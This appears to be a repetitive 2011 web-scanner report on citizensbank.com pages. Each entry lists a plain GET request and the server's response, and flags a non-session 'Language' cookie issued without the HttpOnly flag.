GET /careers/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19513
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/banking-packages.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 36694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:04 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 53422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/help-me-choose-gateway.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:03 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 23849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/order-checks.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:03 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 23079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial-banking/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer-service/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/terms-and-conditions.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 30789
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /greensense/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:41 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/find-your-fit.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:17:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com/home-equity/help-me-choose-home-equity.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/lines.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:31 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 45072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/loans.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:20 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 39896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/compare.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:15 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 32240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 41632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/home-equity.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:16 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 22861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /moneyhelp/?WT.ac=moneyhelp HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:22 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19797
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 50083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:21 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 50083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/home-refinance.aspx?WT.ac=refinance HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 20706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
